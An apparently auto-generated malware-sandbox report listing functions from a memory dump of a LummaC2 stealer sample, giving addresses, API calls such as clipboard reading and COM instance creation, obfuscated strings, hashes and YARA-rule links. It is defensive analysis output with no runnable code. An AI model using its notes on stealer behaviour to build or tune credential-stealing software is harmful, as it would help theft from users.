Function 006EBC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 006EBCA2

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 12019f0362493909a76ece7dd329a49706a7a9b1664e6b4d205c092e1d129782
Instruction ID: b8fdfdb5ff1e48d62d8dd1d621b18e5ee1caf26cdb62111c796bd09298363f1f
Opcode Fuzzy Hash: 12019f0362493909a76ece7dd329a49706a7a9b1664e6b4d205c092e1d129782
Instruction Fuzzy Hash: 75E04FB5A125459FCB48CF29EC5047977B3EB58310714612DE503C7360DF389502CB48

Function 006EA080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,7B1647F3,006B88F3,10130D9D), ref: 006EA090

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 192a3ab6905cc27945f08bb87a178724ecdf6f3a533c18f28ed84888dcc4af01
Instruction ID: a00fdc65de74dc00ee99901830eced59c00d1cfc178162195054e89ffa228aba
Opcode Fuzzy Hash: 192a3ab6905cc27945f08bb87a178724ecdf6f3a533c18f28ed84888dcc4af01
Instruction Fuzzy Hash: B7C04831086221AACA602B15EC09B8A3A69EF45360F2A4095B108660B18AB0AC828AD8

Non-executed Functions

Function 006E483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 006E4982
b, xrefs: 006E4895
>, xrefs: 006E4A43
l, xrefs: 006E4887
n, xrefs: 006E4879
h, xrefs: 006E486B
>, xrefs: 006E498A
`, xrefs: 006E48A3
f, xrefs: 006E4A8C
1, xrefs: 006E491A
_, xrefs: 006E4A84
d, xrefs: 006E48BF
?, xrefs: 006E48F0
f, xrefs: 006E48B1
<, xrefs: 006E4992
O, xrefs: 006E4880
0, xrefs: 006E4B4D
<, xrefs: 006E4A3A
b, xrefs: 006E4A7C
3, xrefs: 006E499E
j, xrefs: 006E485D
0, xrefs: 006E49A2
t, xrefs: 006E484F
), xrefs: 006E4946
2, xrefs: 006E499A
], xrefs: 006E4A94
:, xrefs: 006E497A

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: )$0$0$1$2$3$8$:$<$<$>$>$?$O$]$_$`$b$b$d$f$f$h$j$l$n$t
API String ID: 0-3467771618
Opcode ID: fc3844e8bc24725823a81814d8f9ee1b92a259c4e1a48659ca95c260343352f2
Instruction ID: b9d6c60cc71e1771914ffb3812b04759b98757e74b3e1a1d4bcd1b04e87a200e
Opcode Fuzzy Hash: fc3844e8bc24725823a81814d8f9ee1b92a259c4e1a48659ca95c260343352f2
Instruction Fuzzy Hash: 2AE1A2219087E98EDB22C67C88443DDBFB25B53324F1843D8D4E86B3D6C7754A86CB66

Function 006E1D10 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 006E1D59
GetSystemMetrics.USER32 ref: 006E1D69

Strings

Hko, xrefs: 006E1FCF
jo, xrefs: 006E1F4B
(ko, xrefs: 006E1FA3
ko, xrefs: 006E1F98
Pko, xrefs: 006E1FDA
pko, xrefs: 006E2006
8ko, xrefs: 006E1FB9
, xrefs: 006E1E56
hko, xrefs: 006E1FFB
0ko, xrefs: 006E1FAE
`ko, xrefs: 006E1FF0
Xko, xrefs: 006E1FE5
@ko, xrefs: 006E1FC4
jo, xrefs: 006E1F40

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: MetricsSystem
String ID: $ ko$(ko$0ko$8ko$@ko$Hko$Pko$Xko$`ko$hko$pko$jo$jo
API String ID: 4116985748-2006484237
Opcode ID: b41f4dbdf5041e6f8bc9f5d2ea9ebcb3b32bf8a529ed67f451bab4a44f1c167d
Instruction ID: e3b44790b53c4185c0daf97f2fb67a0504ffc919a0aa9c9876a4d234598ccf94
Opcode Fuzzy Hash: b41f4dbdf5041e6f8bc9f5d2ea9ebcb3b32bf8a529ed67f451bab4a44f1c167d
Instruction Fuzzy Hash: EFA16AB001D389CBD370DF18C558BABBFE1BB85308F50892DE6999B651C7B59848CB83

Function 006E6BF0 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 718memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(006F168C,00000000,00000001,006F167C,00000000), ref: 006E6E11
SysAllocString.OLEAUT32(F5A3FBA8), ref: 006E6EDA
CoSetProxyBlanket.OLE32(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 006E6F18
SysAllocString.OLEAUT32(68DA6AD6), ref: 006E6F6D
SysAllocString.OLEAUT32(BD01C371), ref: 006E7025
VariantInit.OLEAUT32(F8FBFAF5), ref: 006E7097
SysFreeString.OLEAUT32(?), ref: 006E7382
SysFreeString.OLEAUT32(?), ref: 006E7388
SysFreeString.OLEAUT32(00000000), ref: 006E7399

Strings

\, xrefs: 006E6DCB

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInitInstanceProxyVariant
String ID: \
API String ID: 2737081056-2967466578
Opcode ID: d2966412f4377b303a56c492a434cb44b87b9759fa886337d77ad2bcc4c19b84
Instruction ID: 2b4fc1b204f76e70d8e1ad13cae9ac17e9428d289c0fb5cea009a7f6a31a974e
Opcode Fuzzy Hash: d2966412f4377b303a56c492a434cb44b87b9759fa886337d77ad2bcc4c19b84
Instruction Fuzzy Hash: FD320071A493808FD718CF29C8907ABBBE2EFD5310F188A2DE5958B391D774D905CB92

Function 006BB14F Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

EtEz, xrefs: 006BB1D6
gTuZ, xrefs: 006BB18F
BpAv, xrefs: 006BB1CC
.L~R, xrefs: 006BB181
6\/b, xrefs: 006BB19D
DxY~, xrefs: 006BB1E0
'H%N, xrefs: 006BB17A
;lMr, xrefs: 006BB1C2
9D,J, xrefs: 006BB173
Kh;n, xrefs: 006BB1B8
7, xrefs: 006BB5E9
fPcV, xrefs: 006BB188

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 'H%N$.L~R$6\/b$7$9D,J$;lMr$BpAv$DxY~$EtEz$Kh;n$fPcV$gTuZ
API String ID: 0-762781089
Opcode ID: db59e2abf34649dc0480b1da11e39a38b333a18e5657db31dc310a0aa5042c08
Instruction ID: 151254b983918e2ad7c2189d3a51122d4c1b8cd551d7a3e3feed5fd695c09686
Opcode Fuzzy Hash: db59e2abf34649dc0480b1da11e39a38b333a18e5657db31dc310a0aa5042c08
Instruction Fuzzy Hash: AD02B8B5204B01DFD324CF25D8917A6BBE2FF89300F14996CD5AA8B7A0DB75A846CF44

Function 006D3FF1 Relevance: 14.9, Strings: 11, Instructions: 1151COMMON

Download Yara Rule

Strings

`.`,, xrefs: 006D4881
|*z(, xrefs: 006D488C
?2, xrefs: 006D4418
^_, xrefs: 006D4223
RQ, xrefs: 006D4423
~x, xrefs: 006D47DC
Um, xrefs: 006D47F2
}{, xrefs: 006D47D1
XY, xrefs: 006D4FE1
GZ, xrefs: 006D442E
~C, xrefs: 006D47E7

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: ?2$GZ$RQ$Um$XY$^_$`.`,$|*z($}{$~C$~x
API String ID: 0-3286641888
Opcode ID: d965737d0c32181daa1d541640e54226674f71114411fa324cdb3d0a5c932468
Instruction ID: 6c624bd3731ecd57bb0f67baf6ace1acaba756b9358ebccfc399a011d133b890
Opcode Fuzzy Hash: d965737d0c32181daa1d541640e54226674f71114411fa324cdb3d0a5c932468
Instruction Fuzzy Hash: 47A262B160C7858BD334CF24D8517AFBBF2EB95300F10892DE5DA9B251E7719A06CB86

Function 006C0F71 Relevance: 14.5, Strings: 11, Instructions: 732COMMON

Download Yara Rule

Strings

*, xrefs: 006C1579
}, xrefs: 006C0F7F
t, xrefs: 006C12E2
8, xrefs: 006C1571
E, xrefs: 006C1872
F, xrefs: 006C0FF4
F, xrefs: 006C1743
5, xrefs: 006C144C
V, xrefs: 006C187A
x, xrefs: 006C17E7
T, xrefs: 006C186A

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: *$5$8$E$F$F$T$V$t$x$}
API String ID: 0-2030276459
Opcode ID: d6bbf8680cfa95bec5d57c11b61c67aca386b684313c6e7b6189ab612ce5ac23
Instruction ID: d2e508bf1d3972ac3c2518fa8246377a8d962e60cdf1c11661d495cd4af914e4
Opcode Fuzzy Hash: d6bbf8680cfa95bec5d57c11b61c67aca386b684313c6e7b6189ab612ce5ac23
Instruction Fuzzy Hash: 2652907160D7908FD364DF38C4957AEBBE2ABC6314F188A6ED4D9C7382D63888418B53

Function 006D1550 Relevance: 14.2, Strings: 11, Instructions: 497COMMON

Download Yara Rule

Strings

e, xrefs: 006D176C
\, xrefs: 006D1B06
P, xrefs: 006D1961
[, xrefs: 006D1957
d, xrefs: 006D1767
U, xrefs: 006D1952
R, xrefs: 006D195C
\, xrefs: 006D175D
!@, xrefs: 006D1583
,, xrefs: 006D1A6C
k, xrefs: 006D1762

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$P$R$U$[$\$\$d$e$k
API String ID: 1279760036-3655135053
Opcode ID: 98dea20bc3a1077f18fd01a4a7b2434b5b1ad83f0fde62785f4c4340d03dfbe9
Instruction ID: 802e5b4f5c879c5419bb6d6e615dec9d7baeb76d2afb890204cc87be9ecdb08a
Opcode Fuzzy Hash: 98dea20bc3a1077f18fd01a4a7b2434b5b1ad83f0fde62785f4c4340d03dfbe9
Instruction Fuzzy Hash: 0922A671A0C7809FD364CF28C4903AFBBE2AB96314F14496EE4D58B391D7B99845CB47

Function 006CE230 Relevance: 9.9, Strings: 7, Instructions: 1107COMMON

Download Yara Rule

Strings

WYRT, xrefs: 006CE566
pKp^, xrefs: 006CE54E
]^he, xrefs: 006CE55E
@Nxz, xrefs: 006CE536
FEtp, xrefs: 006CE5DF
vvFE, xrefs: 006CE546
f, xrefs: 006CE438

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: @Nxz$FEtp$WYRT$]^he$f$pKp^$vvFE
API String ID: 0-4211064948
Opcode ID: 058461d7709199c09908065d785d8995a536d2210a9d3361bed3426a316cbc6f
Instruction ID: d2c64d62fb8e70f571a4873832e7eba9273b3122d541e531300db39a1d69cb9c
Opcode Fuzzy Hash: 058461d7709199c09908065d785d8995a536d2210a9d3361bed3426a316cbc6f
Instruction Fuzzy Hash: 8A72E47150C3818FC725CF28C450BBEBBE2EF95314F188A6DE4E58B392D6369905CB92

Function 006C5640 Relevance: 9.7, Strings: 7, Instructions: 943COMMON

Download Yara Rule

Strings

wq, xrefs: 006C6063
JHN], xrefs: 006C5D66
s|}, xrefs: 006C606E
UR, xrefs: 006C5AE3
YU]&, xrefs: 006C6170
>j%h, xrefs: 006C5976
Fi, xrefs: 006C5D71

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
API String ID: 0-2664314784
Opcode ID: 9a9956b701ecee4fea87c36b4b7ba4f35deac3b991abcffdbf48d38ec13d6da2
Instruction ID: ad7e6fd12a572a37f35c8c35adf31b38876da7139f14dbe8bfd3d298a8af0fae
Opcode Fuzzy Hash: 9a9956b701ecee4fea87c36b4b7ba4f35deac3b991abcffdbf48d38ec13d6da2
Instruction Fuzzy Hash: AA5216B15087408BD7249F28CC55BBFB7E6EFD5314F18492CE48A8B391EB34A941CB56

Function 006C1A94 Relevance: 9.3, Strings: 7, Instructions: 531COMMON

Download Yara Rule

Strings

;, xrefs: 006C1B11
U, xrefs: 006C205E
1, xrefs: 006C1C89
%, xrefs: 006C1E31
', xrefs: 006C1AA7
], xrefs: 006C1DB7
c, xrefs: 006C2059

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: %$'$1$;$U$]$c
API String ID: 0-3216539101
Opcode ID: 2501643f7f61a2e0017aceee968d080252229f9033d2f3249a5b702e9ed49d66
Instruction ID: 6bf8da8b207d79d7ad91e44d9c1456547cb0c42687d492f5cb8de91c42b9f9c9
Opcode Fuzzy Hash: 2501643f7f61a2e0017aceee968d080252229f9033d2f3249a5b702e9ed49d66
Instruction Fuzzy Hash: 2012D67150C7908BD764DF38C4947EFBBE2AB86320F148A2EE9E9873D2D6348545CB42

Function 006E1B10 Relevance: 9.2, APIs: 6, Instructions: 152clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 006E1B24
GetClipboardData.USER32 ref: 006E1B3F
GlobalLock.KERNEL32 ref: 006E1B58
GetWindowLongW.USER32 ref: 006E1BC7
GlobalUnlock.KERNEL32 ref: 006E1CE7
CloseClipboard.USER32 ref: 006E1CF4

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: cab7f2a4e37ad0a378d1a24fa0899b813754cfa763d338c494f8b4e1133c6b33
Instruction ID: 7cbcad3076285b57b864ef570becb367f41362f72a6d4ef7bd3ef35f46e97137
Opcode Fuzzy Hash: cab7f2a4e37ad0a378d1a24fa0899b813754cfa763d338c494f8b4e1133c6b33
Instruction Fuzzy Hash: D251057260C7818FC3009FBD888526EBAE2ABC6320F28472DE5E5CB3D1D6788545D357

Function 006D26D3 Relevance: 8.3, Strings: 6, Instructions: 769COMMON

Download Yara Rule

Strings

r~, xrefs: 006D2A16
0, xrefs: 006D2888
?<, xrefs: 006D2AB6
zw, xrefs: 006D2A06
20m, xrefs: 006D3026
1{, xrefs: 006D2A0E

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$1{$20m$?<$r~$zw
API String ID: 0-3416983039
Opcode ID: 0a86aeb6bc866512c481eb1fccc3cefb81ec412ccf1a0b738a80c663d6f5809a
Instruction ID: 62a24e57825b1426bc12a40a10d3368b8bc585cad12a75e44e0573128565924f
Opcode Fuzzy Hash: 0a86aeb6bc866512c481eb1fccc3cefb81ec412ccf1a0b738a80c663d6f5809a
Instruction Fuzzy Hash: 7F42E375A083518FD328CF29D8A076BBBE2FF95304F19896CE8D55B391DB349905CB82

Function 006B9290 Relevance: 7.9, Strings: 6, Instructions: 429COMMON

Download Yara Rule

Strings

CM, xrefs: 006B9608
Egx|, xrefs: 006B92CA
RRP\, xrefs: 006B96DE
kj, xrefs: 006B9458
clfg, xrefs: 006B92E2
C, xrefs: 006B95B5

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: C$CM$Egx|$RRP\$clfg$kj
API String ID: 0-2969717086
Opcode ID: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction ID: d901c79c30931d4fa94c146e175ead1afa18cecc70e84fa9fc7a88c867e89bbf
Opcode Fuzzy Hash: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction Fuzzy Hash: 37C118B154C3908BD315CF3984A03EBBBE29FD7315F19896CE4E54B386D639490ACB62

Function 006C8095 Relevance: 7.6, Strings: 5, Instructions: 1319COMMON

Download Yara Rule

Strings

Q230, xrefs: 006C8B93
d, xrefs: 006C8726
', xrefs: 006C9102
(, xrefs: 006C82E1
K, xrefs: 006C8162

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: '$K$Q230$d$(
API String ID: 0-937174541
Opcode ID: ebeb5bf196ed1bc3c622e8e3da1472f2163d0f08c7c92ce0d2de72951a0639f4
Instruction ID: 05571d191546b3ba5693459f9a2832c5621c6e3110759eeaee1c5cdec45b482b
Opcode Fuzzy Hash: ebeb5bf196ed1bc3c622e8e3da1472f2163d0f08c7c92ce0d2de72951a0639f4
Instruction Fuzzy Hash: 3092EF716083418FD724CF28C891BBBB7E2EFD5354F18896DE4C98B291EB349945CB92

Function 006D70F9 Relevance: 5.8, Strings: 4, Instructions: 802COMMON

Download Yara Rule

Strings

>.8, xrefs: 006D74AC
=&2), xrefs: 006D74BA
LL, xrefs: 006D72E0
p, xrefs: 006D72D9

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: p$=&2)$>.8$LL
API String ID: 0-1181295447
Opcode ID: 5054b37772007c8b8ac061d1117485c58ee8e9689d42dd0528ab48f602735370
Instruction ID: cffbc78415c835ac0ab746acf47ed0b212b6cc72161886bf0a95acb379a1b00c
Opcode Fuzzy Hash: 5054b37772007c8b8ac061d1117485c58ee8e9689d42dd0528ab48f602735370
Instruction Fuzzy Hash: 744203B5E016118FDB18CF28D8516BEB7B3FF85310F18822DD456AB395EB34A912CB91

Function 006BC97C Relevance: 5.5, Strings: 4, Instructions: 533COMMON

Download Yara Rule

Strings

1{, xrefs: 006BD024
zw, xrefs: 006BD019
?<, xrefs: 006BD0C2
r~, xrefs: 006BD02F

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

